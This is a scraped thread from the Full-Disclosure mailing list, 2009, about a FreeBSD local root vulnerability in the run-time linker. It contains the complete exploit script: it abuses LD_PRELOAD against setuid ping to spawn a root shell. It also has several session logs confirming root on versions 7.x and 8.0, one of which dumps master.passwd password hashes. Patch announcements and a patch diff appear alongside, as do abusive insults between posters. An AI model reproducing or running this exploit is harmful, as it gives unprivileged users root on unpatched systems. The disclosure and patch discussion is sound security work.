Re: [Full-disclosure] ** FreeBSD local r00t zeroday
-- Message: 1 Date: Fri, 4 Dec 2009 21:40:27 -0600 From: Chris r...@operamail.com Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday To: Benji m...@b3nji.com Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk Message-ID: 20091205034027.12bce7b...@ws5-10.us4.outblaze.com Content-Type: text/plain; charset=iso-8859-1 You're as thick as that other moron. Congrats on achieving Moron #2 status. I didn't say I *POSTED* the code. I told Moron #1 to read it. The two errors I highlighted were merely clues so Moron #1 could unfuck himself. - Original Message - From: Benji m...@b3nji.com To: Chris r...@operamail.com Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday Date: Wed, 2 Dec 2009 14:30:09 + Just FYI, what you posted isn't code, but actually an error message. Just FYI. I think it should be a mandate that morning coffee along with exercise be done before reading mail. -- been great, thanks a.k.a System ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
You're as thick as that other moron. Congrats on achieving Moron #2 status. I didn't say I *POSTED* the code. I told Moron #1 to read it. The two errors I highlighted were merely clues so Moron #1 could unfuck himself. - Original Message - From: Benji m...@b3nji.com To: Chris r...@operamail.com Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday Date: Wed, 2 Dec 2009 14:30:09 + Just FYI, what you posted isn't code, but actually an error message. Just FYI. On Wednesday, December 2, 2009, Chris r...@operamail.com wrote: r00f, you moron. Read the fucking code. Everything you need to know is in the fucking exploit. If you can't grasp it, you have no business running it. c1: error: unrecognized command line option -fPIC ^^^ gcc: program.o: No such file or directory ^ If you want point-and-click exploits, go back to windows. Asshat. -- ___ Surf the Web in a faster, safer and easier way: Download Opera 9 at http://www.opera.com Powered by Outblaze ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ Surf the Web in a faster, safer and easier way: Download Opera 9 at http://www.opera.com Powered by Outblaze ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
Is that the Debian userland/FreeBSD kernel thingy? I fear it is Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux I guess apt-get install local-r00t should work on that system :) Regards, - Nicolas RUFF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
HE HAS THE GCC INSTALLED, FJEER. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of r00f r00f Sent: 01 December 2009 17:59 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday From: Oliver Pinter oliver.pinter () gmail com Date: Tue, 1 Dec 2009 18:28:33 +0100 On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux and a freebsd uname -a looks like this:. IT gives me this : Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux From: FBI BOT terdlinkmobile () gmail com Date: Tue, 1 Dec 2009 12:03:01 -0500 LOL r00f r00f didn't have gcc installed :-O OMG What are you saying ?? I have the gcc installed my friend.. i have just compile a .c file.. and if i type gcc it returns me gcc: No input files specified Ok ? Thanks! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
r00f, you moron. Read the fucking code. Everything you need to know is in the fucking exploit. If you can't grasp it, you have no business running it. c1: error: unrecognized command line option -fPIC ^^^ gcc: program.o: No such file or directory ^ If you want point-and-click exploits, go back to windows. Asshat. -- ___ Surf the Web in a faster, safer and easier way: Download Opera 9 at http://www.opera.com Powered by Outblaze ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
Just FYI, what you posted isn't code, but actually an error message. Just FYI. On Wednesday, December 2, 2009, Chris r...@operamail.com wrote: r00f, you moron. Read the fucking code. Everything you need to know is in the fucking exploit. If you can't grasp it, you have no business running it. c1: error: unrecognized command line option -fPIC ^^^ gcc: program.o: No such file or directory ^ If you want point-and-click exploits, go back to windows. Asshat. -- ___ Surf the Web in a faster, safer and easier way: Download Opera 9 at http://www.opera.com Powered by Outblaze ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
On Tuesday 01 December 2009 06.45.38 bk wrote: On Nov 30, 2009, at 9:25 PM, David Berard wrote: 7.0 not vuln. 7.0 vulnerable here, $ ./env /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # uname -r 7.0-RELEASE-p3 Here as well: bin/Kingcope.sh: new file: 35 lines, 772 characters. [ch...@demon ~]$ chmod +x bin/Kingcope.sh [ch...@demon ~]$ Kingcope.sh bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # whoami root # uname -a FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 r...@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 It's a VM if that matters. -- chort ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ with cpercivals patch: o...@oliverp exploit ./local_root_exploit_env.sh local_root_exploit_env.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; aborting -- thanks, Oliver ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux by running the exploit it gives me this error and doesn't getting rooted..I didn't do anything to patch it ..:s and it doesn't works :p FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' c1: error: unrecognized command line option -fPIC gcc: program.o: No such file or directory 'cc: unrecognized option '-nostartfiles cp: cannot stat `w00t.so.1.0': No such file or directory test.sh: line 35: ./env: No such file or directory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi all, A short time ago a local root exploit was posted to the full-disclosure mailing list; as the name suggests, this allows a local user to execute arbitrary code as root. Normally it is the policy of the FreeBSD Security Team to not publicly discuss security issues until an advisory is ready, but in this case since exploit code is already widely available I want to make a patch available ASAP. Due to the short timeline, it is possible that this patch will not be the final version which is provided when an advisory is sent out; it is even possible (although highly doubtful) that this patch does not fully fix the issue or introduces new issues -- in short, use at your own risk (even more than usual). The patch is at http://people.freebsd.org/~cperciva/rtld.patch and has SHA256 hash ffcba0c20335dd83e9ac0d0e920faf5b4aedf366ee5a41f548b95027e3b770c1 I expect a full security advisory concerning this issue will go out on Wednesday December 2nd. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (FreeBSD) iEYEARECAAYFAksUbjcACgkQFdaIBMps37LP9ACgljaYCfgVuhD2gd9Natpq4H/9 i48An1mgl+Mih+AWN7J9KZ1rsiEU31IZ =MPXj -END PGP SIGNATURE- -- Colin Percival Security Officer, FreeBSD | freebsd.org | The power to serve Founder / author, Tarsnap | tarsnap.com | Online backups for the truly paranoid ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
The patch is at
http://people.freebsd.org/~cperciva/rtld.patch
This patch doesn't work under FreeBSD 7.x due to inexistant
unsetenv(LD_ ELF_HINTS_PATH); in rtld.c
This patch seem to fix the issue on FreeBSD 7.x
--- /usr/src/libexec/rtld-elf/rtld.c2008-11-25 03:59:29.0 +0100
+++ /usr/src/libexec/rtld-elf/rtld.c.new2009-12-01 13:09:15.0
+0100
@@ -358,11 +358,12 @@
* future processes to honor the potentially un-safe variables.
*/
if (!trust) {
-unsetenv(LD_ PRELOAD);
-unsetenv(LD_ LIBMAP);
-unsetenv(LD_ LIBRARY_PATH);
-unsetenv(LD_ LIBMAP_DISABLE);
-unsetenv(LD_ DEBUG);
+ if (unsetenv(LD_ PRELOAD) || unsetenv(LD_ LIBMAP) ||
+ unsetenv(LD_ LIBRARY_PATH) || unsetenv(LD_
LIBMAP_DISABLE) ||
+ unsetenv(LD_ DEBUG)) {
+ _rtld_error(environment corrupt; aborting);
+ die();
+ }
}
ld_debug = getenv(LD_ DEBUG);
libmap_disable = getenv(LD_ LIBMAP_DISABLE) != NULL;
Best Regards.
--
David BERARD
-
23 Boulevard MARENGO, Appartement A15
31500 TOULOUSE
contact(at)davidberard.fr
GPG|PGP KeyId 0xC8533354
GPG|PGP Key http://davidberard.fr/C8533354.gpgkey
-
* No electrons were harmed in *
* the transmission of this email*
PGP.sig
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
Not to disappoint, but it doesn't look like it even compiled, might be the reason it didn't work. Sent from my iPhone On 1 Dec 2009, at 11:59, r00f r00f r00f...@gmail.com wrote: I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux by running the exploit it gives me this error and doesn't getting rooted..I didn't do anything to patch it ..:s and it doesn't works :p FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' c1: error: unrecognized command line option -fPIC gcc: program.o: No such file or directory 'cc: unrecognized option '-nostartfiles cp: cannot stat `w00t.so.1.0': No such file or directory test.sh: line 35: ./env: No such file or directory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
Confirmed on FreeBSD 8.0 $ uname -a FreeBSD 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 $ id uid=1001(rportvli) gid=1001(rportvli) groups=1001(rportvli) $ ./freebsd-0day.sh Desktop env env.c freebsd-0day.sh program.c program.o w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1001(rportvli) gid=1001(rportvli) euid=0(root) groups=1001(rportvli) # On Mon, Nov 30, 2009 at 6:31 PM, phantomcircuit phantomcirc...@covertinferno.org wrote: Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update. %sh exploit.sh Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o private program.c program.o public public_html run.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1001(phantomcircuit) gid=20(staff) euid=0(root) groups=20(staff),0(wheel) # uname -a FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: Fri Oct 2 12:21:39 UTC 2009 r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 # ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
Confirmed on FreeBSD 7.2-RELEASE (GENERIC).
Dawid
On 30 Nov 2009, at 22:12, Kingcope wrote:
** FreeBSD local r00t 0day
Discovered Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 BiG TiME
Go fetch your FreeBSD r00tkitz // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD
versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it
pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like
LD_PRELOAD
to be set when executing setugid binaries like ping or su.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
**
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/
bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/
nologin
operator:*:2:5::0:0:System :/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/
sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/
nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/
nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
:/home/kcope:/bin/sh
#
Systems tested/affected
**
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN
*EXPLOIT*
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat env.c _EOF
#include stdio.h
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], LD_PRELOAD=/tmp/w00t.so.1.0);
execl(/sbin/ping, ping, 0);
}
_EOF
gcc env.c -o env
cat program.c _EOF
#include unistd.h
#include stdio.h
#include sys/types.h
#include stdlib.h
void _init() {
extern char **environ;
environ=NULL;
system(echo ALEX-ALEX;/bin/sh);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -
nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter:
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
LOL r00f r00f didn't have gcc installed :-O ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux and a freebsd uname -a looks like this: FreeBSD foobarbaz 7.2-STABLE FreeBSD 7.2-STABLE #21 r199967+31134af: Tue Dec 1 02:54:53 CET 2009 r...@foobarbaz:/usr/obj/usr/src/sys/stable amd64 but it's a good shot ;) by running the exploit it gives me this error and doesn't getting rooted..I didn't do anything to patch it ..:s and it doesn't works :p FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' c1: error: unrecognized command line option -fPIC gcc: program.o: No such file or directory 'cc: unrecognized option '-nostartfiles cp: cannot stat `w00t.so.1.0': No such file or directory test.sh: line 35: ./env: No such file or directory -- thanks, Oliver ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
*From*: Oliver Pinter oliver.pinter () gmail com *Date*: Tue, 1 Dec 2009 18:28:33 +0100 -- On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux and a freebsd uname -a looks like this:. IT gives me this : Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux *From*: FBI BOT terdlinkmobile () gmail com *Date*: Tue, 1 Dec 2009 12:03:01 -0500 -- LOL r00f r00f didn't have gcc installed :-O OMG What are you saying ?? I have the gcc installed my friend.. i have just compile a .c file.. and if i type gcc it returns me gcc: No input files specified Ok ? Thanks! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
On Tuesday 01 December 2009 18.58.55 r00f r00f wrote: *From*: Oliver Pinter oliver.pinter () gmail com *Date*: Tue, 1 Dec 2009 18:28:33 +0100 -- On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux and a freebsd uname -a looks like this:. IT gives me this : Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux and what is your: sysctl kern.osreldate ? *From*: FBI BOT terdlinkmobile () gmail com *Date*: Tue, 1 Dec 2009 12:03:01 -0500 -- LOL r00f r00f didn't have gcc installed :-O OMG What are you saying ?? I have the gcc installed my friend.. i have just compile a .c file.. and if i type gcc it returns me gcc: No input files specified Ok ? Thanks! -- thanks, Oliver ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
*From*: Oliver Pinter oliver.pinter () gmail com *Date*: Tue, 1 Dec 2009 19:13:55 +0100 -- and what is your: sysctl kern.osreldate ? Here it is! kern.osreldate: 701000 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
On Dec 1, 2009, at 10:33 AM, r00f r00f wrote: From: Oliver Pinter oliver.pinter () gmail com Date: Tue, 1 Dec 2009 19:13:55 +0100 and what is your: sysctl kern.osreldate ? Here it is! kern.osreldate: 701000 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Is that the Debian userland/FreeBSD kernel thingy? -- chort___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ** FreeBSD local r00t zeroday
I think we're missing the point here. The exploit didnt compile due to his/her copy of gcc which apparently doesnt understand -fPIC c1: error: unrecognized command line option -fPIC. Thus, obviously, there's no chance it was ever going to work. On Tue, Dec 1, 2009 at 7:47 PM, bk cho...@gmail.com wrote: On Dec 1, 2009, at 10:33 AM, r00f r00f wrote: *From*: Oliver Pinter oliver.pinter () gmail com *Date*: Tue, 1 Dec 2009 19:13:55 +0100 -- and what is your: sysctl kern.osreldate ? Here it is! kern.osreldate: 701000 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Is that the Debian userland/FreeBSD kernel thingy? -- chort ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ** FreeBSD local r00t zeroday
http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071689.html $ uname -a FreeBSD serev1.domena.pl 7.2-STABLE FreeBSD 7.2-STABLE #1: Tue Dec 1 19:42:43 CET 2009 r...@server1.domena.pl:/usr/src/sys/i386/compile/kern1 i386 $ ./test.sh env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX #id -a uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user) Install patch: cd /usr/src/libexec/rtld-elf fetch http://wojciech.sychut.eu/rtld.patch patch rtld.patch make clean make make install and: $ ./test.sh env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX #id -a uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ** FreeBSD local r00t zeroday
** FreeBSD local r00t 0day
Discovered Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 BiG TiME
Go fetch your FreeBSD r00tkitz // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like ping or su.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
**
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
